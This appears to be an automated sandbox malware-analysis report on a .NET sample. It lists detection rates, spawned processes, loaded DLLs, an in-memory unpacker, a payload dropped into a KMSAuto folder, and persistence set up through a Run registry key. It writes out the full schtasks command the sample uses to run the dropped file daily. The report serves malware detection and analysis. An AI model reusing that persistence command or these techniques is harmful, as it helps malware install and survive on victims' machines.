            Source: nobtpajdjthawd.exeReversingLabs: Detection: 81%
            Source: nobtpajdjthawd.exeVirustotal: Detection: 72%
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile read: C:\Users\user\Desktop\nobtpajdjthawd.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7292 -s 800
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 7
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 780
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 764
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /fJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 7Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasman.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: schannel.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: version.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeSection loaded: uxtheme.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: nobtpajdjthawd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: nobtpajdjthawd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: nobtpajdjthawd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: System.Windows.Forms.pdbac source: WER6131.tmp.dmp.25.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003247000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: Portals.pdb@\ source: WER5E53.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb) source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: costura.dotnetzip.pdb.compressed|||DotNetZip.pdb|565BABCBCD978AF66FE1150CC58FDEAFC9815822|622080 source: nobtpajdjthawd.exe, 00000000.00000002.1277019771.00000000041E9000.00000004.00000800.00020000.00000000.sdmp, nobtpajdjthawd.exe, 00000001.00000002.1309844260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, accc.exe, 0000000E.00000002.1417102381.0000000003449000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: nobtpajdjthawd.exe, accc.exe.1.dr
            Source: Binary string: q costura.dotnetzip.pdb.compressedlB source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: p.pdb.compressed source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.dotnetzip.pdb.compressed@\ source: accc.exe, 00000014.00000002.1364848533.0000000003251000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr
            Source: Binary string: System.pdb source: WER6131.tmp.dmp.25.dr, WER5E53.tmp.dmp.23.dr, WER237C.tmp.dmp.4.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.nobtpajdjthawd.exe.42cff70.1.raw.unpack, epgqLLdQoFNLhGcg.cs.Net Code: JxgpOEMBqDPNJ System.Reflection.Assembly.Load(byte[])
            Source: 14.2.accc.exe.3449550.0.raw.unpack, epgqLLdQoFNLhGcg.cs.Net Code: JxgpOEMBqDPNJ System.Reflection.Assembly.Load(byte[])
            Source: nobtpajdjthawd.exeStatic PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
            Source: nobtpajdjthawd.exeStatic PE information: section name: .CSS
            Source: accc.exe.1.drStatic PE information: section name: .CSS
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 19_2_05A8B5C0 push 4405A5E2h; retf 19_2_05A8B83D
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile created: C:\ProgramData\KMSAuto\accc.exeJump to dropped file
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile created: C:\ProgramData\KMSAuto\accc.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ToolsJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ToolsJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
